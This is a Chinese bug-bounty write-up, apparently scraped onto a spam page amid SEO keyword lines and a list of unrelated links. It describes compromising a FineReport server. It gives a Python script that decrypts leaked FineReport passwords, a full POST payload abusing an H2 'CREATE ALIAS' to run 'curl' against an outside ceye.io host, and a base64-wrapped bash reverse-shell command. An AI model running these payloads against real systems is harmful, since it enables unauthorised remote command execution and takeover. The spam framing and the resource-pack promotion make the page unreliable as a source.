当前位置: 首页 > news >正文

深圳团购网站设计哪家好网络公司办公室图片

深圳团购网站设计哪家好,网络公司办公室图片,临沂在线上网站建设,网上在线看视频为什么卡本文仅供网络安全学习研究#xff0c;违F绕路 资产发现 首先是信息收集子域名#xff0c;谷歌语句直接site:xxx.com -www,一个登录口网站吸引了我的注意力。 我点击电信、网通、自动的时候#xff0c;发现域名跳转到了真实IP 这样#xff0c;就可以对真实IP进行端口扫描-违F绕路 资产发现 首先是信息收集子域名谷歌语句直接site:xxx.com -www,一个登录口网站吸引了我的注意力。 我点击电信、网通、自动的时候发现域名跳转到了真实IP 这样就可以对真实IP进行端口扫描-目录扫描一把梭了发现在8080端口发现ReportServe部署页面。 接着就对帆软的历史漏洞进行测试了。 任意文件读取获取密码解密登录后台 view-source:xxx.xxx.xxx.xxx:8080/ReportServe… 刚开始的时候是空白页查看源代码才发现信息 可以看到用户为posun,密码需要解密一下 解密脚本 cipher ___0022007c0039003b005100e3 #密文 PASSWORD_MASK_ARRAY [19, 78, 10, 15, 100, 213, 43, 23] #掩码 Password cipher cipher[3:] #截断三位后 for i in range(int(len(cipher) / 4)):c1 int(0x cipher[i * 4:(i 1) * 4], 16)c2 c1 ^ PASSWORD_MASK_ARRAY[i % 8]Password Password chr(c2) print (Password) 解密得到123456问题是拿到哪里登录呢突然想到刚才有个数据决策系统拿去登录刚才的数据决策系统. 成功进入后台然而高兴的太早了,因为该站长注册码到期了且没有什么敏感信息。SRC也是反馈危害性不大不能收没办法只能另寻途径了。 【相关技术学习文档】 帆软报表FineRePort未授权远程命令执行漏洞 影响版本: 帆软报表 FineRePortv8.0帆软报表 FineRePortv9.0 xxx.com/WebReport/ReportServer?opfr_logcmdfg_errinfofr_usernameadmin这个接口 打开 点查询 burp拦截数据包 替换post的内容__parameters__{LABEL1:TYPE:,TYPE:6;CREATE ALIAS RUMCMD FOR com.fr.chart.phantom.system.SystemServiceUtils.exeCmd;CALL RUMCMD(curl http://uki7s7.ceye.io);select msg, trace, sinfo, logtime from fr_errrecord where 11,LABEL3:START_TIME:,START_TIME:2020-08-11 00:00,LABEL5:END_TIME:,END_TIME:2020-08-11 16:41,LABEL7:LIMIT:,LIMIT:2} 便操作了一下,前提是需要得知用户名 漏洞地址xxx.xxx.xxx.xxx:8080/ReportServe… 点击查询抓包改包这里先是简单的ceye回显改包后一直forward 可以看到我的ceye收到回显说明该漏洞是存在的为了证明危害性我后面继续了反弹shell操作 bash -c {echo,base64编码}|{base64,-d}|{bash,-i} VPS监听7777端口如图下 反弹shell成功 备注:刚开始对面审核SRC愣是死活复现不出来,手把手教学了,这里有几个问题注意下,查询不能太频繁 容易并发数满,需要等一段时间,我后面第二天并发数才清空. 总结 多观察细节,比如刚刚的真实IP就冒出来了遇到危害性不大漏洞不要慌,留着还能组合其它的漏洞. 给大家的福利 零基础入门 对于从来没有接触过网络安全的同学我们帮你准备了详细的学习成长路线图。可以说是最科学最系统的学习路线大家跟着这个大的方向学习准没问题。 同时每个成长路线对应的板块都有配套的视频提供 因篇幅有限仅展示部分资料 朋友们如果有需要全套《网络安全入门进阶学习资源包》可以扫描下方二维码免费领取如遇扫码问题可以在评论区留言领取哦~ 网络安全面试题 绿盟护网行动 还有大家最喜欢的黑客技术 网络安全源码合集工具包 所有资料共282G朋友们如果有需要全套《网络安全入门黑客进阶学习资源包》可以扫描下方二维码免费领取如遇扫码问题可以在评论区留言领取哦~
http://www.pierceye.com/news/505784/

相关文章:

  • 邱县网站建设河北seo网络优化师
  • iis5.1怎么新建网站中国生意网
  • 教你做吃的网站厦门市集美区建设局网站
  • 电子商务网站建设需要青岛网站建设邓巴迪
  • 网站建设考虑的因素建设网站地图
  • 天津塘沽网站建设新网官方网站
  • 做本地团购网站国外产品网站
  • 湖北省两学一做网站国外浏览器app下载
  • 遵义网站建设公司巴彦淖尔市网站制作
  • 后台管理系统网站模板合作网站登录制作
  • 腾讯云网站备案流程seo优化实训总结
  • 那个网站有免费的模板wordpress首页模板文件
  • 阿里云主机可以放几个网站手机上自己设计广告的软件
  • 南通公司企业网站建设淘宝网店制作
  • 长沙网站建设推广太仓网站建设企业网站
  • 加强网站微信信息编辑队伍建设网站设计 北京店
  • 广州网站建设有限公司程序员入门先学什么
  • 资源下载类网站如何做外链北京有几家宽带网络公司
  • 个人网站要有什么网页设计与制作初学者教程
  • 宁波品牌网站建设芗城区建设局网站
  • 仿卢松松博客网站源码购买网站空间多少钱
  • 无锡网站推微信公众号文章里好看的图片在哪个网站做
  • 做网站建设费用预算龙岩市建筑设计院
  • 网站做适配多少钱浙江建设厅特种考试查询
  • 简单的网站更新 关键词优化 关键词互联如何做网
  • 重庆网站seo搜索引擎优化网站qq登录 开发
  • 备案号放网站下面居中物流网站制作目的
  • 房产网站排名做情侣网站
  • 营销型网站建设推荐国内团购网站做的最好的是
  • 前端网站建设苏州高新区建设局网站管网